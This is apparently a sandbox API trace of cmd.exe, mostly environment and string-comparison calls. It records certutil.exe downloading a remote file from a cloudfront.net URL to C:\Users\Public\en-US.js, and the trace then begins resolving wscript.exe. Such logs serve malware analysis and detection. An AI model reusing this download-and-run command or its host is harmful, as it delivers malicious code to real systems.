[0041.210] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e970f56d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
[0041.210] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff790718680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
[0041.210] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff790718680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0041.210] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff790718680, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0041.210] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
[0041.210] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
[0041.210] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
[0041.210] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
[0041.210] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
[0041.210] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
[0041.210] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
[0041.210] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
[0041.210] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
[0041.210] GetEnvironmentStringsW () returned 0x4e970f58e0*
[0041.210] FreeEnvironmentStringsA (penv="A") returned 1
[0041.210] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff790718680, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0041.210] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff790718680, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0041.210] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
[0041.210] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
[0041.210] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
[0041.210] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
[0041.210] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
[0041.210] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
[0041.210] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
[0041.210] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
[0041.210] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4e96eef3c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x4e96eef3c0, lpFilePart=0x4e96eef3a0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x4e96eef3a0*="system32") returned 0x13
[0041.211] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
[0041.211] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x4e96eef0d0 | out: lpFindFileData=0x4e96eef0d0) returned 0x4e970f0720
[0041.212] FindClose (in: hFindFile=0x4e970f0720 | out: hFindFile=0x4e970f0720) returned 1
[0041.212] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x4e96eef0d0 | out: lpFindFileData=0x4e96eef0d0) returned 0x4e970f0720
[0041.212] FindClose (in: hFindFile=0x4e970f0720 | out: hFindFile=0x4e970f0720) returned 1
[0041.212] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
[0041.212] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
[0041.212] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
[0041.212] GetEnvironmentStringsW () returned 0x4e970f74f0*
[0041.212] FreeEnvironmentStringsA (penv="=") returned 1
[0041.212] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff790720920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0041.213] GetConsoleOutputCP () returned 0x1b5
[0041.216] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff790718640 | out: lpCPInfo=0x7ff790718640) returned 1
[0041.216] GetUserDefaultLCID () returned 0x409
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff79071c680, cchData=8 | out: lpLCData=":") returned 2
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4e96eef4f0, cchData=128 | out: lpLCData="0") returned 2
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4e96eef4f0, cchData=128 | out: lpLCData="0") returned 2
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4e96eef4f0, cchData=128 | out: lpLCData="1") returned 2
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff79071c690, cchData=8 | out: lpLCData="/") returned 2
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff79071c6e0, cchData=32 | out: lpLCData="Mon") returned 4
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff79071c720, cchData=32 | out: lpLCData="Tue") returned 4
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff79071c760, cchData=32 | out: lpLCData="Wed") returned 4
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff79071c7a0, cchData=32 | out: lpLCData="Thu") returned 4
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff79071c7e0, cchData=32 | out: lpLCData="Fri") returned 4
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff79071c820, cchData=32 | out: lpLCData="Sat") returned 4
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff79071c860, cchData=32 | out: lpLCData="Sun") returned 4
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff79071c6a0, cchData=8 | out: lpLCData=".") returned 2
[0041.216] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff79071c6c0, cchData=8 | out: lpLCData=",") returned 2
[0041.216] setlocale (category=0, locale=".OCP") returned="English_United States.437"
[0041.217] GetConsoleTitleW (in: lpConsoleTitle=0x4e970f6750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0041.217] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffb3d260000
[0041.217] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="CopyFileExW") returned 0x7ffb3d2825e0
[0041.217] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="IsDebuggerPresent") returned 0x7ffb3d281f90
[0041.217] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffb3a853a10
[0041.218] _wcsicmp (_String1="certutil.exe", _String2=")") returned 58
[0041.218] _wcsicmp (_String1="FOR", _String2="certutil.exe") returned 3
[0041.218] _wcsicmp (_String1="FOR/?", _String2="certutil.exe") returned 3
[0041.218] _wcsicmp (_String1="IF", _String2="certutil.exe") returned 6
[0041.218] _wcsicmp (_String1="IF/?", _String2="certutil.exe") returned 6
[0041.218] _wcsicmp (_String1="REM", _String2="certutil.exe") returned 15
[0041.218] _wcsicmp (_String1="REM/?", _String2="certutil.exe") returned 15
[0041.220] _wcsicmp (_String1="FOR", _String2="wscript.exe") returned -17
[0041.220] _wcsicmp (_String1="FOR/?", _String2="wscript.exe") returned -17
[0041.220] _wcsicmp (_String1="IF", _String2="wscript.exe") returned -14
[0041.220] _wcsicmp (_String1="IF/?", _String2="wscript.exe") returned -14
[0041.220] _wcsicmp (_String1="REM", _String2="wscript.exe") returned -5
[0041.220] _wcsicmp (_String1="REM/?", _String2="wscript.exe") returned -5
[0041.223] GetConsoleTitleW (in: lpConsoleTitle=0x4e96eef320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0041.223] GetFileAttributesW (lpFileName="certutil.exe" (normalized: "c:\\windows\\system32\\certutil.exe")) returned 0x20
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="DIR") returned -1
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="ERASE") returned -2
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="DEL") returned -1
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="TYPE") returned -17
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="COPY") returned -10
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="CD") returned 1
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="CHDIR") returned -3
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="RENAME") returned -15
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="REN") returned -15
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="ECHO") returned -2
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="SET") returned -16
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="PAUSE") returned -13
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="DATE") returned -1
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="TIME") returned -17
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="PROMPT") returned -13
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="MD") returned -10
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="MKDIR") returned -10
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="RD") returned -15
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="RMDIR") returned -15
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="PATH") returned -13
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="GOTO") returned -4
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="SHIFT") returned -16
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="CLS") returned -7
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="CALL") returned 4
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="VERIFY") returned -19
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="VER") returned -19
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="VOL") returned -19
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="EXIT") returned -2
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="SETLOCAL") returned -16
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="ENDLOCAL") returned -2
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="TITLE") returned -17
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="START") returned -16
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="DPATH") returned -1
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="KEYS") returned -8
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="MOVE") returned -10
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="PUSHD") returned -13
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="POPD") returned -13
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="ASSOC") returned 2
[0041.224] _wcsicmp (_String1="certutil.exe", _String2="FTYPE") returned -3
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="BREAK") returned 1
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="COLOR") returned -10
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="MKLINK") returned -10
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="DIR") returned -1
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="ERASE") returned -2
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="DEL") returned -1
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="TYPE") returned -17
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="COPY") returned -10
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="CD") returned 1
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="CHDIR") returned -3
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="RENAME") returned -15
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="REN") returned -15
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="ECHO") returned -2
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="SET") returned -16
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="PAUSE") returned -13
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="DATE") returned -1
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="TIME") returned -17
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="PROMPT") returned -13
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="MD") returned -10
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="MKDIR") returned -10
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="RD") returned -15
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="RMDIR") returned -15
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="PATH") returned -13
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="GOTO") returned -4
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="SHIFT") returned -16
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="CLS") returned -7
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="CALL") returned 4
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="VERIFY") returned -19
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="VER") returned -19
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="VOL") returned -19
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="EXIT") returned -2
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="SETLOCAL") returned -16
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="ENDLOCAL") returned -2
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="TITLE") returned -17
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="START") returned -16
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="DPATH") returned -1
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="KEYS") returned -8
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="MOVE") returned -10
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="PUSHD") returned -13
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="POPD") returned -13
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="ASSOC") returned 2
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="FTYPE") returned -3
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="BREAK") returned 1
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="COLOR") returned -10
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="MKLINK") returned -10
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="FOR") returned -3
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="IF") returned -6
[0041.225] _wcsicmp (_String1="certutil.exe", _String2="REM") returned -15
[0041.226] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8
[0041.226] SetErrorMode (uMode=0x0) returned 0x1
[0041.226] SetErrorMode (uMode=0x1) returned 0x0
[0041.226] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e970f7990, lpFilePart=0x4e96eeebc0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x4e96eeebc0*="system32") returned 0x13
[0041.226] SetErrorMode (uMode=0x1) returned 0x1
[0041.226] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff790718680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
[0041.226] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0041.230] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff790718680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0041.231] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0041.232] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\certutil.exe", fInfoLevelId=0x1, lpFindFileData=0x4e96eee940, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4e96eee940) returned 0x4e970f6a50
[0041.232] FindClose (in: hFindFile=0x4e970f6a50 | out: hFindFile=0x4e970f6a50) returned 1
[0041.232] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
[0041.232] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
[0041.232] GetConsoleTitleW (in: lpConsoleTitle=0x4e96eeeea0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0041.232] InitializeProcThreadAttributeList (in: lpAttributeList=0x4e96eeedc0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4e96eeecc0 | out: lpAttributeList=0x4e96eeedc0, lpSize=0x4e96eeecc0) returned 1
[0041.232] UpdateProcThreadAttribute (in: lpAttributeList=0x4e96eeedc0, dwFlags=0x0, Attribute=0x60001, lpValue=0x4e96eeecac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4e96eeedc0, lpPreviousValue=0x0) returned 1
[0041.232] GetStartupInfoW (in: lpStartupInfo=0x4e96eeed50 | out: lpStartupInfo=0x4e96eeed50*(cb=0x68, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0xc, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
[0041.232] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
[0041.233] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
[0041.233] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1
[0041.234] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\certutil.exe", lpCommandLine="certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x4e96eeece0*(cb=0x70, lpReserved=0x0, lpDesktop="", lpTitle="certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4e96eeecc8 | out: lpCommandLine="certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js ", lpProcessInformation=0x4e96eeecc8*(hProcess=0x8c, hThread=0x88, dwProcessId=0xcf4, dwThreadId=0xce8)) returned 1
[0041.673] CloseHandle (hObject=0x88) returned 1
[0041.673] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0041.673] GetEnvironmentStringsW () returned 0x4e970fae70*
[0041.673] FreeEnvironmentStringsA (penv="=") returned 1
[0041.673] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0
[0045.222] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0x4e96eeec48 | out: lpExitCode=0x4e96eeec48*=0x0) returned 1
[0045.222] CloseHandle (hObject=0x8c) returned 1
[0045.222] _vsnwprintf (in: _Buffer=0x4e96eeee08, _BufferCount=0x13, _Format="%08X", _ArgList=0x4e96eeec58 | out: _Buffer="00000000") returned 8
[0045.222] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0045.222] GetEnvironmentStringsW () returned 0x4e970fae70*
[0045.222] FreeEnvironmentStringsA (penv="=") returned 1
[0045.222] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0045.222] GetEnvironmentStringsW () returned 0x4e970fae70*
[0045.222] FreeEnvironmentStringsA (penv="=") returned 1
[0045.222] DeleteProcThreadAttributeList (in: lpAttributeList=0x4e96eeedc0 | out: lpAttributeList=0x4e96eeedc0)
[0045.222] GetConsoleTitleW (in: lpConsoleTitle=0x4e96eef350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0045.223] GetFileAttributesW (lpFileName="wscript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x20
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="DIR") returned 19
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="ERASE") returned 18
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="DEL") returned 19
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="TYPE") returned 3
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="COPY") returned 20
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="CD") returned 20
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="CHDIR") returned 20
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="RENAME") returned 5
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="REN") returned 5
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="ECHO") returned 18
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="SET") returned 4
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="PAUSE") returned 7
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="DATE") returned 19
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="TIME") returned 3
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="PROMPT") returned 7
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="MD") returned 10
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="MKDIR") returned 10
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="RD") returned 5
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="RMDIR") returned 5
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="PATH") returned 7
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="GOTO") returned 16
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="SHIFT") returned 4
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="CLS") returned 20
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="CALL") returned 20
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="VERIFY") returned 1
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="VER") returned 1
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="VOL") returned 1
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="EXIT") returned 18
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="SETLOCAL") returned 4
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="ENDLOCAL") returned 18
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="TITLE") returned 3
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="START") returned 4
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="DPATH") returned 19
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="KEYS") returned 12
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="MOVE") returned 10
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="PUSHD") returned 7
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="POPD") returned 7
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="ASSOC") returned 22
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="FTYPE") returned 17
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="BREAK") returned 21
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="COLOR") returned 20
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="MKLINK") returned 10
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="DIR") returned 19
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="ERASE") returned 18
[0045.223] _wcsicmp (_String1="wscript.exe", _String2="DEL") returned 19
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="TYPE") returned 3
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="COPY") returned 20
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="CD") returned 20
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="CHDIR") returned 20
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="RENAME") returned 5
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="REN") returned 5
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="ECHO") returned 18
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="SET") returned 4
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="PAUSE") returned 7
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="DATE") returned 19
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="TIME") returned 3
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="PROMPT") returned 7
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="MD") returned 10
[0045.224] _wcsicmp (_String1="wscript.exe", _String2="MKDIR") returned 10
